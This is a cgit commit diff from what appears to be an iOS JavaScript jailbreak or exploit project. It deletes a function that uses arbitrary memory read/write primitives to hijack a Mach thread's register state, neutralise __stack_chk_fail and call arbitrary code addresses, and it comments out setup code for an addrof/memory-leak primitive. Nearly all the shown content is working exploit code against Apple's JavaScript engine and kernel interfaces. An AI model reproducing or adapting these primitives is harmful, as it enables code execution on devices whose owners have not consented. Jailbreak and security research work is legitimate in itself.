summaryrefslogtreecommitdiff
path: root/src/js/primitives
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/primitives')
-rw-r--r--src/js/primitives/call.js94
-rw-r--r--src/js/primitives/mem.js3
2 files changed, 2 insertions, 95 deletions
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index a581c91..74a20d8 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -158,100 +158,6 @@ function symaddr(sym) {
return addy;
}
-function callnarg_new() {
- if (arguments.length < 1) {
- return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
- }
-
- var stack_shit = 0x161000;
-
- /*
- * setup ptrs
- */
- write_u32(countptr, count);
- write_u32(thptr, th);
- write_u32(threadptr, thread);
- write_u32(thread_stateptr, thread_state);
-
- write_u32(countptrptr, countptr);
- write_u32(thptrptr, thptr);
- write_u32(threadptrptr, threadptr);
- write_u32(thread_stateptrptr, thread_stateptr);
-
- var addy = arguments[0];
- var dyld_shc_slide = get_dyld_shc_slide();
-
- /*
- * make __stack_chk_fail infinite loop
- * (works by setting its lazy addy to its resolver, thus the resolver just
- * endlessly jumps to iself)
- */
- write_u32(__stack_chk_fail_lazy_addy + dyld_shc_slide, __stack_chk_fail_resolver + dyld_shc_slide);
-
- /*
- * if the thread doesn't exist, create it.
- */
- calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
- thread = read_u32(threadptr);
- write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
- rth = read_u32(th);
- calls4arg("thread_suspend", rth, 0, 0, 0);
-
- if (pthread_ret == 0) {
- pthread_ret = malloc(4);
- }
-
- /*
- * write first 4 to r0-r3, rest to stack
- */
- for (var i = 1; i < arguments.length; i++) {
- if (i <= 4) {
- write_u32(thread_state + ((i - 1) << 2), arguments[i]);
- } else {
- write_u32(stack_shit + ((i - 5) << 2), arguments[i]);
- }
- }
-
- var stack_shit_ret_offset = 0x58;
-
- write_u32(stack_shit + stack_shit_ret_offset, pthread_exit + dyld_shc_slide);
-
- /*
- * stack
- */
- write_u32(thread_state + (13 << 2), stack_shit);
-
- /*
- * return address, infinite loop
- */
- write_u32(thread_state + (14 << 2), add_sp_0x3c + dyld_shc_slide);
-
- /*
- * pc
- */
- write_u32(thread_state + (15 << 2), addy);
-
- /*
- * cpsr, magic
- */
- if (addy & 1) {
- write_u32(thread_state + (16 << 2), 0x40000020);
- } else {
- write_u32(thread_state + (16 << 2), 0x40000000);
- }
-
- /*
- * set the state
- */
- calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
- calls4arg("thread_resume", rth, 0, 0, 0);
-
- calls4arg("pthread_join", thread, pthread_ret, 0, 0);
- write_u32(count, 17);
- calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
- return read_u32(pthread_ret);
-}
-
function callnarg() {
if (arguments.length < 1) {
return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 0c03090..d664e7b 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -308,12 +308,13 @@ var jsobj_addr;
var large_buf = new Uint32Array(0x100000);
var large_buf_ptr = 0;
+/*
function prep_shit() {
string_ref = scall("JSStringCreateWithUTF8CString", "victim");
global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
large_buf_ptr = leak_vec(large_buf);
-}
+}*/
function addrof(obj) {
victim.target = obj;
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:48:50 +0000